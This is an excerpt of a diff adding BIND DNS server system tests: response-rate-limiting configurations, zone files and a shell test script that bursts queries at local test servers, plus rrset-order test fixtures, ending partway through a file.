b/bin/tests/system/rrl/ns3/named.conf.in @@ -0,0 +1,48 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + session-keyfile "session.key"; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + notify no; + recursion yes; + dnssec-validation yes; + + // check that all of the options are parsed without limiting anything + rate-limit { + responses-per-second 200; + referrals-per-second 220; + nodata-per-second 230; + nxdomains-per-second 240; + errors-per-second 250; + all-per-second 700; + ipv4-prefix-length 24; + ipv6-prefix-length 64; + qps-scale 10; + window 1; + max-table-size 1000; + log-only no; + min-table-size 0; + }; + +}; + +zone "." { type hint; file "hints"; }; + +zone "tld3."{ type primary; file "tld3.db"; }; diff --git a/bin/tests/system/rrl/ns3/tld3.db b/bin/tests/system/rrl/ns3/tld3.db new file mode 100644 index 0000000..a534c6e --- /dev/null +++ b/bin/tests/system/rrl/ns3/tld3.db @@ -0,0 +1,20 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; rate limit response from this zone + +$TTL 120 +@ SOA tld3. hostmaster.ns.tld3. ( 1 3600 1200 604800 60 ) + NS ns + NS . +ns A 10.53.0.3 + +*.a3 A 192.0.3.3 diff --git a/bin/tests/system/rrl/ns4/hints b/bin/tests/system/rrl/ns4/hints new file mode 100644 index 0000000..a1d435e --- /dev/null +++ b/bin/tests/system/rrl/ns4/hints @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +. 0 NS ns1. +ns1. 0 A 10.53.0.1 diff --git a/bin/tests/system/rrl/ns4/named.conf.in b/bin/tests/system/rrl/ns4/named.conf.in new file mode 100644 index 0000000..cc17b91 --- /dev/null +++ b/bin/tests/system/rrl/ns4/named.conf.in @@ -0,0 +1,67 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + session-keyfile "session.key"; + pid-file "named.pid"; + statistics-file "named.stats"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + notify no; + recursion yes; + dnssec-validation yes; + max-udp-size 4096; + + rate-limit { + responses-per-second 2; + all-per-second 50; + slip 3; + exempt-clients { 10.53.0.7; }; + log-only yes; + + // small enough to force a table expansion + min-table-size 75; + }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; +controls { + inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +/* + * These log settings have no effect unless "-g" is removed from ../../start.pl + */ +logging { + channel debug { + file "log-debug"; + print-category yes; print-severity yes; severity debug 10; + }; + channel queries { + file "log-queries"; + print-category yes; print-severity yes; severity info; + }; + category rate-limit { debug; queries; }; + category queries { debug; queries; }; +}; + +zone "." { type hint; file "hints"; }; + +zone "tld4."{ type primary; file "tld4.db"; }; diff --git a/bin/tests/system/rrl/ns4/tld4.db b/bin/tests/system/rrl/ns4/tld4.db new file mode 100644 index 0000000..a7bc319 --- /dev/null +++ b/bin/tests/system/rrl/ns4/tld4.db @@ -0,0 +1,45 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; rate limit response from this zone + +$TTL 120 +@ SOA tld4. hostmaster.ns.tld4. ( 1 3600 1200 604800 60 ) + NS ns + NS . +ns A 10.53.0.2 + +; basic rate limiting +a1 A 192.0.2.1 + +; wildcards +*.a2 A 192.0.2.2 + +; a3 is in tld3 + +; a4 does not exist to give NXDOMAIN + +; a5 for TCP requests +a5 A 192.0.2.5 + +; a6 for whitelisted clients +a6 A 192.0.2.6 + +; a7 for SERVFAIL + +; a8 for NODATA +a8 A 192.0.2.8 + +; a9 for all-per-second limit +$GENERATE 101-180 all$.a9 A 192.0.2.8 + +; oversized TXT record +$GENERATE 1-100 big 1 TXT "txt$" diff --git a/bin/tests/system/rrl/setup.sh b/bin/tests/system/rrl/setup.sh new file mode 100644 index 0000000..be63ed9 --- /dev/null +++ b/bin/tests/system/rrl/setup.sh @@ -0,0 +1,23 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$SHELL clean.sh + +copy_setports broken.conf.in broken.conf +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf +copy_setports ns4/named.conf.in ns4/named.conf diff --git a/bin/tests/system/rrl/tests.sh b/bin/tests/system/rrl/tests.sh new file mode 100644 index 0000000..d4d2a83 --- /dev/null +++ b/bin/tests/system/rrl/tests.sh @@ -0,0 +1,291 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# test response rate limiting + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +#set -x + +ns1=10.53.0.1 # root, defining the others +ns2=10.53.0.2 # test server +ns3=10.53.0.3 # secondary test server +ns4=10.53.0.4 # log-only test server +ns7=10.53.0.7 # whitelisted client + +USAGE="$0: [-x]" +while getopts "x" c; do + case $c in + x) set -x;; + *) echo "$USAGE" 1>&2; exit 1;; + esac +done +shift `expr $OPTIND - 1 || true` +if test "$#" -ne 0; then + echo "$USAGE" 1>&2 + exit 1 +fi +# really quit on control-C +trap 'exit 1' 1 2 15 + + +ret=0 +setret () { + ret=1 + echo_i "$*" +} + + +# Wait until soon after the start of a second to make results consistent. +# The start of a second credits a rate limit. +# This would be far easier in C or by assuming a modern version of perl. +sec_start () { + START=`date` + while true; do + NOW=`date` + if test "$START" != "$NOW"; then + return + fi + $PERL -e 'select(undef, undef, undef, 0.05)' || true + done +} + + +# turn off ${HOME}/.digrc +HOME=/dev/null; export HOME + +# $1=number of tests $2=target domain $3=dig options +QNUM=1 +burst () { + BURST_LIMIT=$1; shift + BURST_DOM_BASE="$1"; shift + + XCNT=$CNT + CNT='XXX' + eval FILENAME="mdig.out-$BURST_DOM_BASE" + CNT=$XCNT + + DOMS="" + CNTS=`$PERL -e 'for ( $i = 0; $i < '$BURST_LIMIT'; $i++) { printf "%03d\n", '$QNUM' + $i; }'` + for CNT in $CNTS + do + eval BURST_DOM="$BURST_DOM_BASE" + DOMS="$DOMS $BURST_DOM" + done + ARGS="+burst +nocookie +continue +time=1 +tries=1 -p ${PORT} $* @$ns2 $DOMS" + $MDIG $ARGS 2>&1 | \ + tr -d '\r' | \ + tee -a full-$FILENAME | \ + sed -n -e '/^;; AUTHORITY/,/^$/d' \ + -e '/^;; ADDITIONAL/,/^$/d' \ + -e 's/^[^;].* \([^ ]\{1,\}\)$/\1/p' \ + -e 's/;; flags.* tc .*/TC/p' \ + -e 's/;; .* status: NXDOMAIN.*/NXDOMAIN/p' \ + -e 's/;; .* status: NOERROR.*/NOERROR/p' \ + -e 's/;; .* status: SERVFAIL.*/SERVFAIL/p' \ + -e 's/response failed with timed out.*/drop/p' \ + -e 's/;; communications error to.*/drop/p' >> $FILENAME & + QNUM=`expr $QNUM + $BURST_LIMIT` +} + +# compare integers $1 and $2; ensure the difference is no more than $3 +range () { + $PERL -e 'if (abs(int($ARGV[0]) - int($ARGV[1])) > int($ARGV[2])) { exit(1) }' $1 $2 $3 +} + +# $1=domain $2=IP address $3=# of IP addresses $4=TC $5=drop +# $6=NXDOMAIN $7=SERVFAIL or other errors +ck_result() { + # wait to the background mdig calls to complete. + wait + BAD=no + ADDRS=`grep -E "^$2$" mdig.out-$1 2>/dev/null | wc -l` + # count simple truncated and truncated NXDOMAIN as TC + TC=`grep -E "^TC|NXDOMAINTC$" mdig.out-$1 2>/dev/null | wc -l` + DROP=`grep -E "^drop$" mdig.out-$1 2>/dev/null | wc -l` + # count NXDOMAIN and truncated NXDOMAIN as NXDOMAIN + NXDOMAIN=`grep -E "^NXDOMAIN|NXDOMAINTC$" mdig.out-$1 2>/dev/null | wc -l` + SERVFAIL=`grep -E "^SERVFAIL$" mdig.out-$1 2>/dev/null | wc -l` + NOERROR=`grep -E "^NOERROR$" mdig.out-$1 2>/dev/null | wc -l` + + range $ADDRS "$3" 1 || + setret "$ADDRS instead of $3 '$2' responses for $1" && + BAD=yes + + range $TC "$4" 1 || + setret "$TC instead of $4 truncation responses for $1" && + BAD=yes + + range $DROP "$5" 1 || + setret "$DROP instead of $5 dropped responses for $1" && + BAD=yes + + range $NXDOMAIN "$6" 1 || + setret "$NXDOMAIN instead of $6 NXDOMAIN responses for $1" && + BAD=yes + + range $SERVFAIL "$7" 1 || + setret "$SERVFAIL instead of $7 error responses for $1" && + BAD=yes + + range $NOERROR "$8" 1 || + setret "$NOERROR instead of $8 NOERROR responses for $1" && + BAD=yes + + if test -z "$BAD"; then + rm -f mdig.out-$1 + fi +} + + +ckstats () { + LABEL="$1"; shift + TYPE="$1"; shift + EXPECTED="$1"; shift + C=`tr -d '\r' < ns2/named.stats | + sed -n -e "s/[ ]*\([0-9]*\).responses $TYPE for rate limits.*/\1/p" | + tail -1` + C=`expr 0$C + 0` + + range "$C" $EXPECTED 1 || + setret "wrong $LABEL $TYPE statistics of $C instead of $EXPECTED" +} + + +######### +sec_start + +# Tests of referrals to "." must be done before the hints are loaded +# or with "additional-from-cache no" +burst 5 a1.tld3 +norec +# basic rate limiting +burst 3 a1.tld2 +# delay allows an additional response. +sleep 1 +burst 10 a1.tld2 +# Request 30 different qnames to try a wildcard. +burst 30 'y.x$CNT.a2.tld2' + +# IP TC drop NXDOMAIN SERVFAIL NOERROR +# referrals to "." +ck_result a1.tld3 x 0 1 2 0 0 2 +# check 13 results including 1 second delay that allows an additional response +ck_result a1.tld2 192.0.2.1 3 4 6 0 0 8 + +# Check the wildcard answers. +# The zone origin name of the 30 requests is counted. +ck_result 'y.x*.a2.tld2' 192.0.2.2 2 10 18 0 0 12 + +######### +sec_start + +burst 10 'x.a3.tld3' +burst 10 'y$CNT.a3.tld3' +burst 10 'z$CNT.a4.tld2' + +# 10 identical recursive responses are limited +ck_result 'x.a3.tld3' 192.0.3.3 2 3 5 0 0 5 + +# 10 different recursive responses are not limited +ck_result 'y*.a3.tld3' 192.0.3.3 10 0 0 0 0 10 + +# 10 different NXDOMAIN responses are limited based on the parent name. +# We count 13 responses because we count truncated NXDOMAIN responses +# as both truncated and NXDOMAIN. +ck_result 'z*.a4.tld2' x 0 3 5 5 0 0 + +$RNDCCMD $ns2 stats +ckstats first dropped 36 +ckstats first truncated 21 + + +######### +sec_start + +burst 10 a5.tld2 +tcp +burst 10 a6.tld2 -b $ns7 +burst 10 a7.tld4 +burst 2 a8.tld2 -t AAAA +burst 2 a8.tld2 -t TXT +burst 2 a8.tld2 -t SPF + +# IP TC drop NXDOMAIN SERVFAIL NOERROR +# TCP responses are not rate limited +ck_result a5.tld2 192.0.2.5 10 0 0 0 0 10 + +# whitelisted client is not rate limited +ck_result a6.tld2 192.0.2.6 10 0 0 0 0 10 + +# Errors such as SERVFAIL are rate limited. +ck_result a7.tld4 x 0 0 8 0 2 0 + +# NODATA responses are counted as the same regardless of qtype. +ck_result a8.tld2 x 0 2 2 0 0 4 + +$RNDCCMD $ns2 stats +ckstats second dropped 46 +ckstats second truncated 23 + + +######### +sec_start + +# IP TC drop NXDOMAIN SERVFAIL NOERROR +# all-per-second +# The qnames are all unique but the client IP address is constant. +QNUM=101 +burst 60 'all$CNT.a9.tld2' + +ck_result 'a*.a9.tld2' 192.0.2.8 50 0 10 0 0 50 + +$RNDCCMD $ns2 stats +ckstats final dropped 56 +ckstats final truncated 23 + +######### +sec_start + +DIGOPTS="+nocookie +nosearch +time=1 +tries=1 +ignore -p ${PORT}" +$DIG $DIGOPTS @$ns4 A a7.tld4 > /dev/null 2>&1 +$DIG $DIGOPTS @$ns4 A a7.tld4 > /dev/null 2>&1 +$DIG $DIGOPTS @$ns4 A a7.tld4 > /dev/null 2>&1 +$DIG $DIGOPTS @$ns4 A a7.tld4 > /dev/null 2>&1 +$DIG $DIGOPTS @$ns4 A a7.tld4 > /dev/null 2>&1 +$DIG $DIGOPTS @$ns4 A a7.tld4 > /dev/null 2>&1 +$DIG $DIGOPTS @$ns4 A a7.tld4 > /dev/null 2>&1 +$DIG $DIGOPTS @$ns4 A a7.tld4 > /dev/null 2>&1 +$DIG $DIGOPTS @$ns4 A a7.tld4 > /dev/null 2>&1 +$DIG $DIGOPTS @$ns4 A a7.tld4 > /dev/null 2>&1 +$DIG $DIGOPTS @$ns4 A a7.tld4 > /dev/null 2>&1 + +# regression test for GL #2839 +DIGOPTS="+bufsize=4096 +ignore -p ${PORT}" +$DIG $DIGOPTS @$ns4 TXT big.tld4 > /dev/null 2>&1 + +grep "would limit" ns4/named.run >/dev/null 2>&1 || +setret "\"would limit\" not found in log file." + +$NAMED -D rrl-ns5 -gc broken.conf > broken.out 2>&1 & +sleep 2 +grep "min-table-size 1" broken.out > /dev/null || setret "min-table-size 0 was not changed to 1" + +if [ -f named.pid ]; then + $KILL `cat named.pid` + setret "named should not have started, but did" +fi + +echo_i "exit status: $ret" +[ $ret -eq 0 ] || exit 1 diff --git a/bin/tests/system/rrsetorder/clean.sh b/bin/tests/system/rrsetorder/clean.sh new file mode 100644 index 0000000..c64ae34 --- /dev/null +++ b/bin/tests/system/rrsetorder/clean.sh @@ -0,0 +1,23 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f dig.out.test* +rm -f dig.out.cyclic dig.out.fixed dig.out.random dig.out.nomatch dig.out.none +rm -f dig.out.0 dig.out.1 dig.out.2 dig.out.3 +rm -f dig.out.cyclic2 +rm -f ns2/root.bk +rm -f ns?/named.run ns?/named.core +rm -f */named.memstats +rm -f ns*/named.lock +rm -f ns*/named.conf +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/rrsetorder/dig.out.fixed.good b/bin/tests/system/rrsetorder/dig.out.fixed.good new file mode 100644 index 0000000..eaf9c63 --- /dev/null +++ b/bin/tests/system/rrsetorder/dig.out.fixed.good @@ -0,0 +1,4 @@ +1.2.3.4 +1.2.3.3 +1.2.3.1 +1.2.3.2 diff --git a/bin/tests/system/rrsetorder/dig.out.random.good1 b/bin/tests/system/rrsetorder/dig.out.random.good1 new file mode 100644 index 0000000..c272c75 --- /dev/null +++ b/bin/tests/system/rrsetorder/dig.out.random.good1 @@ -0,0 +1,4 @@ +1.2.3.1 +1.2.3.2 +1.2.3.3 +1.2.3.4 diff --git a/bin/tests/system/rrsetorder/dig.out.random.good10 b/bin/tests/system/rrsetorder/dig.out.random.good10 new file mode 100644 index 0000000..6a39e3f --- /dev/null +++ b/bin/tests/system/rrsetorder/dig.out.random.good10 @@ -0,0 +1,4 @@ +1.2.3.2 +1.2.3.3 +1.2.3.4 +1.2.3.1 diff --git a/bin/tests/system/rrsetorder/dig.out.random.good11 b/bin/tests/system/rrsetorder/dig.out.random.good11 new file mode 100644 index 0000000..efbc792 --- /dev/null +++ b/bin/tests/system/rrsetorder/dig.out.random.good11 @@ -0,0 +1,4 @@ +1.2.3.2 +1.2.3.4 +1.2.3.1 +1.2.3.3 diff --git a/bin/tests/system/rrsetorder/dig.out.random.good12 b/bin/tests/system/rrsetorder/dig.out.random.good12 new file mode 100644 index 0000000..c859a2e --- /dev/null +++ b/bin/tests/system/rrsetorder/dig.out.random.good12 @@ -0,0 +1,4 @@ +1.2.3.2 +1.2.3.4 +1.2.3.3 +1.2.3.1 diff --git a/bin/tests/system/rrsetorder/dig.out.random.good13 b/bin/tests/system/rrsetorder/dig.out.random.good13 new file mode 100644 index 0000000..49bf54b --- /dev/null +++ b/bin/tests/system/rrsetorder/dig.out.random.good13 @@ -0,0 +1,4 @@ +1.2.3.3 +1.2.3.1 +1.2.3.2 +1.2.3.4 diff --git a/bin/tests/system/rrsetorder/dig.out.random.good14 b/bin/tests/system/rrsetorder/dig.out.random.good14 new file mode 100644 index 0000000..974aa89 --- /dev/null +++ b/bin/tests/system/rrsetorder/dig.out.random.good14 @@ -0,0 +1,4 @@ +1.2.3.3 +1.2.3.1 +1.2.3.4 +1.2.3.2 diff --git a/bin/tests/system/rrsetorder/dig.out.random.good15 b/bin/tests/system/rrsetorder/dig.out.random.good15 new file mode 100644 index 0000000..e8deb67 --- /dev/null +++ b/bin/tests/system/rrsetorder/dig.out.random.good15 @@ -0,0 +1,4 @@ +1.2.3.3 +1.2.3.2 +1.2.3.1 +1.2.3.4 diff --git a/bin/tests/system/rrsetorder/dig.out.random.good16 b/bin/tests/system/rrsetorder/dig.out.random.good16 new file mode 100644 index 0000000..f467087 --- /dev/null +++ b/bin/tests/system/rrsetorder/dig.out.random.good16 @@ -0,0 +1,4 @@ +1.2.3.3 +1.2.3.2 +1.2.3.4 +1.2.3.1 diff --git a/bin/tests/system/rrsetorder/dig.out.random.good17 b/bin/tests/system/rrsetorder/dig.out.random.good17 new file mode 100644 index 0000000..6082a25 --- /dev/null +++ b/bin/tests/system/rrsetorder/dig.out.random.good17 @@ -0,0 +1,4 @@ +1.2.3.3 +1.2.3.4 +1.2.3.1 +1.2.3.2 diff --git a/bin/tests/system/rrsetorder/dig.out.random.good18 b/bin/tests/system/rrsetorder/dig.out.random.good18 new file mode 100644 index 0000000..07eefa0 --- /dev/null +++ b/bin/tests/system/rrsetorder/dig.out.random.good18 @@ -0,0 +1,4 @@ +1.2.3.3 +1.2.3.4 +1.2.3.2 +1.2.3.1 diff --git a/bin/tests/system/rrsetorder/dig.out.random.good19 b/bin/tests/system/rrsetorder/dig.out.random.good19 new file mode 100644 index 0000000..a5530c6 --- /dev/null +++ b/bin/tests/system/rrsetorder/dig.out.random.good19 @@ -0,0 +1,4 @@ +1.2.3.4 +1.2.3.1 +1.2.3.2 +1.2.3.3 diff --git a/bin/tests/system/rrsetorder/dig.out.random.good2 b/bin/tests/system/rrsetorder/dig.out.random.good2 new file mode 100644 index 0000000..00da93a --- /dev/null +++ b/bin/tests/system/rrsetorder/dig.out.random.good2 @@ -0,0 +1,4 @@ +1.2.3.1 +1.2.3.2 +1.2.3.4 +1.2.3.3 diff --git a/bin/tests/system/rrsetorder/dig.out.random.good20 b/bin/tests/system/rrsetorder/dig.out.random.good20 new file mode 100644 index 0000000..6dcf6da --- /dev/null +++ b/bin/tests/system/rrsetorder/dig.out.random.good20 @@ -0,0 +1,4 @@ +1.2.3.4 +1.2.3.1 +1.2.3.3 +1.2.3.2 diff --git a/bin/tests/system/rrsetorder/dig.out.random.good21 b/bin/tests/system/rrsetorder/dig.out.random.good21 new file mode 100644 index 0000000..9dcc63f --- /dev/null +++ b/bin/tests/system/rrsetorder/dig.out.random.good21 @@ -0,0 +1,4 @@ +1.2.3.4 +1.2.3.2 +1.2.3.1 +1.2.3.3 diff --git a/bin/tests/system/rrsetorder/dig.out.random.good22 b/bin/tests/system/rrsetorder/dig.out.random.good22 new file mode 100644 index 0000000..4c51aa6 --- /dev/null +++ b/bin/tests/system/rrsetorder/dig.out.random.good22 @@ -0,0 +1,4 @@ +1.2.3.4 +1.2.3.2 +1.2.3.3 +1.2.3.1 diff --git a/bin/tests/system/rrsetorder/dig.out.random.good23 b/bin/tests/system/rrsetorder/dig.out.random.good23 new file mode 100644 index 0000000..eaf9c63 --- /dev/null +++ b/bin/tests/system/rrsetorder/dig.out.random.good23 @@ -0,0 +1,4 @@ +1.2.3.4 +1.2.3.3 +1.2.3.1 +1.2.3.2 diff --git a/bin/tests/system/rrsetorder/dig.out.random.good24 b/bin/tests/system/rrsetorder/dig.out.random.good24 new file mode 100644 index 0000000..c25c756 --- /dev/null +++ b/bin/tests/system/rrsetorder/dig.out.random.good24 @@ -0,0 +1,4 @@ +1.2.3.4 +1.2.3.3 +1.2.3.2 +1.2.3.1 diff --git a/bin/tests/system/rrsetorder/dig.out.random.good3 b/bin/tests/system/rrsetorder/dig.out.random.good3 new file mode 100644 index 0000000..4d50059 --- /dev/null +++ b/bin/tests/system/rrsetorder/dig.out.random.good3 @@ -0,0 +1,4 @@ +1.2.3.1 +1.2.3.3 +1.2.3.2 +1.2.3.4 diff --git a/bin/tests/system/rrsetorder/dig.out.random.good4 b/bin/tests/system/rrsetorder/dig.out.random.good4 new file mode 100644 index 0000000..0b34afa --- /dev/null +++ b/bin/tests/system/rrsetorder/dig.out.random.good4 @@ -0,0 +1,4 @@ +1.2.3.1 +1.2.3.3 +1.2.3.4 +1.2.3.2 diff --git a/bin/tests/system/rrsetorder/dig.out.random.good5 b/bin/tests/system/rrsetorder/dig.out.random.good5 new file mode 100644 index 0000000..efe0e25 --- /dev/null +++ b/bin/tests/system/rrsetorder/dig.out.random.good5 @@ -0,0 +1,4 @@ +1.2.3.1 +1.2.3.4 +1.2.3.2 +1.2.3.3 diff --git a/bin/tests/system/rrsetorder/dig.out.random.good6 b/bin/tests/system/rrsetorder/dig.out.random.good6 new file mode 100644 index 0000000..d2ca6fc --- /dev/null +++ b/bin/tests/system/rrsetorder/dig.out.random.good6 @@ -0,0 +1,4 @@ +1.2.3.1 +1.2.3.4 +1.2.3.3 +1.2.3.2 diff --git a/bin/tests/system/rrsetorder/dig.out.random.good7 b/bin/tests/system/rrsetorder/dig.out.random.good7 new file mode 100644 index 0000000..0d8312a --- /dev/null +++ b/bin/tests/system/rrsetorder/dig.out.random.good7 @@ -0,0 +1,4 @@ +1.2.3.2 +1.2.3.1 +1.2.3.3 +1.2.3.4 diff --git a/bin/tests/system/rrsetorder/dig.out.random.good8 b/bin/tests/system/rrsetorder/dig.out.random.good8 new file mode 100644 index 0000000..3b27693 --- /dev/null +++ b/bin/tests/system/rrsetorder/dig.out.random.good8 @@ -0,0 +1,4 @@ +1.2.3.2 +1.2.3.1 +1.2.3.4 +1.2.3.3 diff --git a/bin/tests/system/rrsetorder/dig.out.random.good9 b/bin/tests/system/rrsetorder/dig.out.random.good9 new file mode 100644 index 0000000..61192af --- /dev/null +++ b/bin/tests/system/rrsetorder/dig.out.random.good9 @@ -0,0 +1,4 @@ +1.2.3.2 +1.2.3.3 +1.2.3.1 +1.2.3.4 diff --git a/bin/tests/system/rrsetorder/ns1/named.conf.in b/bin/tests/system/rrsetorder/ns1/named.conf.in new file mode 100644 index 0000000..98301c2 --- /dev/null +++ b/bin/tests/system/rrsetorder/ns1/named.conf.in @@ -0,0 +1,40 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; + notify no; + rrset-order { + name "fixed.example" order fixed; + name "random.example" order random; + name "cyclic.example" order cyclic; + name "none.example" order none; + type NS order random; + order cyclic; + }; +}; + +zone "." { + type primary; + file "root.db"; + notify explicit; + also-notify { 10.53.0.2; }; +}; diff --git a/bin/tests/system/rrsetorder/ns1/root.db b/bin/tests/system/rrsetorder/ns1/root.db new file mode 100644 index 0000000..094eec7 --- /dev/null +++ b/bin/tests/system/rrsetorder/ns1/root.db @@ -0,0 +1,51 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +. SOA hostmaster.isc.org. a.root-servers.nil. ( + 2000042100 + 600 + 600 + 1200 + 600 ) +. NS a.root-servers.nil. +. NS cyclic.example. +a.root-servers.nil. A 10.53.0.1 +; +fixed.example. A 1.2.3.4 +fixed.example. A 1.2.3.3 +fixed.example. A 1.2.3.1 +fixed.example. A 1.2.3.2 +; +random.example. A 1.2.3.1 +random.example. A 1.2.3.2 +random.example. A 1.2.3.3 +random.example. A 1.2.3.4 +; +cyclic.example. A 1.2.3.4 +cyclic.example. A 1.2.3.3 +cyclic.example. A 1.2.3.2 +cyclic.example. A 1.2.3.1 +; +cyclic2.example. A 1.2.3.4 +cyclic2.example. A 1.2.3.3 +cyclic2.example. A 1.2.3.2 +cyclic2.example. A 1.2.3.1 +; +nomatch.example. A 1.2.3.1 +nomatch.example. A 1.2.3.2 +nomatch.example. A 1.2.3.3 +nomatch.example. A 1.2.3.4 +; +none.example. A 1.2.3.1 +none.example. A 1.2.3.2 +none.example. A 1.2.3.3 +none.example. A 1.2.3.4 diff --git a/bin/tests/system/rrsetorder/ns2/named.conf.in b/bin/tests/system/rrsetorder/ns2/named.conf.in new file mode 100644 index 0000000..164400a --- /dev/null +++ b/bin/tests/system/rrsetorder/ns2/named.conf.in @@ -0,0 +1,39 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; + notify yes; + rrset-order { + name "fixed.example" order fixed; + name "random.example" order random; + name "cyclic.example" order cyclic; + name "none.example" order none; + type NS order random; + order cyclic; + }; +}; + +zone "." { + type secondary; + primaries { 10.53.0.1; }; + file "root.bk"; +}; diff --git a/bin/tests/system/rrsetorder/ns3/named.conf.in b/bin/tests/system/rrsetorder/ns3/named.conf.in new file mode 100644 index 0000000..a5850ca --- /dev/null +++ b/bin/tests/system/rrsetorder/ns3/named.conf.in @@ -0,0 +1,38 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + notify yes; + rrset-order { + name "fixed.example" order fixed; + name "random.example" order random; + name "cyclic.example" order cyclic; + name "none.example" order none; + type NS order random; + order cyclic; + }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; diff --git a/bin/tests/system/rrsetorder/ns4/named.conf.in b/bin/tests/system/rrsetorder/ns4/named.conf.in new file mode 100644 index 0000000..d12f50f --- /dev/null +++ b/bin/tests/system/rrsetorder/ns4/named.conf.in @@ -0,0 +1,34 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * 